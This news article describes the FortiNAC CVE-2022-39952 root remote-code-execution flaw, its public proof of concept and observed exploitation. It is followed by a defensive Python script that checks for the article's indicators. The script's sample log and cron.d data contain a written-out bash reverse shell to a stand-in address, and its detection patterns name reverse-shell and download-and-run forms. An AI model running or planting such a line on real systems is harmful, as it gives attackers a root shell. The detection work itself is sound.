FortiNAC is Fortinet's zero-trust access product designed for enterprises to secure a variety of devices, including IT systems, IoT devices, operational technology and industrial control systems. If successfully exploited, CVE-2022-39952 lets an unauthenticated attacker execute unauthorized code or commands on vulnerable FortiNAC web servers. Exploitation requires no user interaction or privileges. Fortinet advised upgrading to the latest version.

Now, a proof of concept (POC) exploit is available, and exploitation attempts have been observed in the wild.

Penetration testing vendor Horizon3.ai released an automated POC exploit through GitHub Tuesday, along with a blog post by Zach Hanley, chief attack engineer at Horizon3.ai. In addition to a deep-dive analysis with indicators of compromise (IOCs), Hanley warned that an unauthenticated attacker could "write arbitrary files on the system and as a result obtain remote code execution in the context of the root user."

He noted several ways attackers could turn that arbitrary file write into remote code execution. Most significantly, attackers could write SSH keys into a user profile, which allows administrative access. "In this case, we write a cron job to /etc/cron.d/, but attackers could also overwrite any binary on the system that is regularly executed or SSH keys to a user profile," Hanley wrote in the blog post. To weaponize the flaw, Hanley noted that it only took a minute to get a reverse shell as the root user after sending a malicious zip file. Under IOCs, he recommended that users check logs for the line "Running configApplianceXml."

Hanley told TechTarget Editorial that the FortiNAC vulnerability is easy to exploit. "It's a very trivial vulnerability due to it being an abuse of logic," he said.

Hours after Horizon3.ai released the POC, the Shadowserver Foundation, a cybersecurity nonprofit, started to observe threat activity. "We are seeing FortiNAC CVE-2022-39952 exploitation attempts from multiple IPs in our honeypot sensors," Shadowserver wrote on Twitter. "Make sure to upgrade your FortiNAC as specified in:" (Shadowserver, 21, 2023)

Coalition, Inc., also observed an increase in exploitation activity, as well as a rise in scanning for vulnerable instances, following the publicly available PoC.
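The two indicators the article points at, the "Running configApplianceXml" log line and a dropped cron job under /etc/cron.d/, can be triaged with a short script. The following is an added example written for this page, not code from the article, Horizon3.ai or Fortinet. The log lines and cron.d contents are constructed for the example; the syslog-style timestamp prefix, the file names and the reverse-shell patterns used to flag cron commands are assumptions, not FortiNAC specifics.

```python
"""Triage helper for the FortiNAC CVE-2022-39952 indicators described above.

Added example, not code from the article, Horizon3.ai or Fortinet. Sample data
below is constructed; the log format and cron.d file names are assumptions.
"""
import re

# The log marker Horizon3.ai's write-up recommends checking for.
IOC_LOG_MARKER = "Running configApplianceXml"

# Heuristics for commands a post-exploitation dropper tends to put in a cron
# entry (reverse shells, pipe-to-shell downloaders). Assumed, not from the page.
SUSPICIOUS_CRON_PATTERNS = [
    r"/dev/tcp/",
    r"\bbash -i\b",
    r"\bnc\b.*\s-e\s",
    r"\b(curl|wget)\b.*\|\s*(ba)?sh\b",
    r"base64 (-d|--decode)",
]

# Constructed sample log lines (assumed "YYYY-MM-DD HH:MM:SS host proc: msg" prefix).
SAMPLE_LOG = [
    "2023-02-22 14:02:11 fortinac configApplianceXml: Running configApplianceXml",
    "2023-02-22 14:02:12 fortinac sshd[1201]: Accepted publickey for admin",
    "2023-02-22 14:05:40 fortinac cron[880]: (root) CMD (bash -i >& /dev/tcp/198.51.100.7/4444 0>&1)",
    "2023-02-22 14:06:00 fortinac configApplianceXml: Running configApplianceXml",
]

# Constructed contents of /etc/cron.d/: one legitimate-looking file, one dropped by an attacker.
SAMPLE_CRON_D = {
    "fortinac-maint": "SHELL=/bin/sh\n# nightly cleanup\n0 3 * * * root /usr/local/bin/cleanup.sh\n",
    "x": "* * * * * root bash -i >& /dev/tcp/198.51.100.7/4444 0>&1\n",
}


def find_ioc_hits(log_lines, marker=IOC_LOG_MARKER):
    """Return (timestamp or None, stripped line) for every log line carrying the marker."""
    hits = []
    ts_re = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})")
    for line in log_lines:
        if marker in line:
            m = ts_re.match(line)
            hits.append((m.group(1) if m else None, line.strip()))
    return hits


def parse_cron_d_line(line):
    """Split a /etc/cron.d line into (schedule, user, command).

    Returns None for blank lines, comments and environment assignments such as
    SHELL=/bin/sh. /etc/cron.d entries carry a user field, unlike user crontabs,
    which is why a dropped file there can run a command as root.
    """
    s = line.strip()
    if not s or s.startswith("#") or "=" in s.split()[0]:
        return None
    n = 1 if s.startswith("@") else 5          # "@reboot" style vs. five time fields
    parts = s.split(None, n + 1)
    if len(parts) < n + 2:
        return None
    return (" ".join(parts[:n]), parts[n], parts[n + 1])


def flag_cron_entries(cron_files, patterns=SUSPICIOUS_CRON_PATTERNS):
    """cron_files: dict of file name -> contents.

    Returns {file name: [(line number, user, command), ...]} for every entry whose
    command matches one of the suspicious patterns.
    """
    compiled = [re.compile(p) for p in patterns]
    flagged = {}
    for name, content in cron_files.items():
        for lineno, raw in enumerate(content.splitlines(), 1):
            parsed = parse_cron_d_line(raw)
            if parsed is None:
                continue
            _schedule, user, command = parsed
            if any(p.search(command) for p in compiled):
                flagged.setdefault(name, []).append((lineno, user, command))
    return flagged


if __name__ == "__main__":
    for ts, line in find_ioc_hits(SAMPLE_LOG):
        print(f"IOC hit at {ts}: {line}")
    for name, entries in flag_cron_entries(SAMPLE_CRON_D).items():
        for lineno, user, command in entries:
            print(f"suspicious /etc/cron.d/{name} line {lineno} runs as {user}: {command}")
```

On a real appliance the same two functions would be fed the actual log files and the contents of /etc/cron.d/; the pattern list is a starting point, and a clean match on the log marker alone is not proof of compromise, since the line may also appear during legitimate use of the feature, so correlate timestamps with the cron.d and SSH authorized_keys changes the article describes.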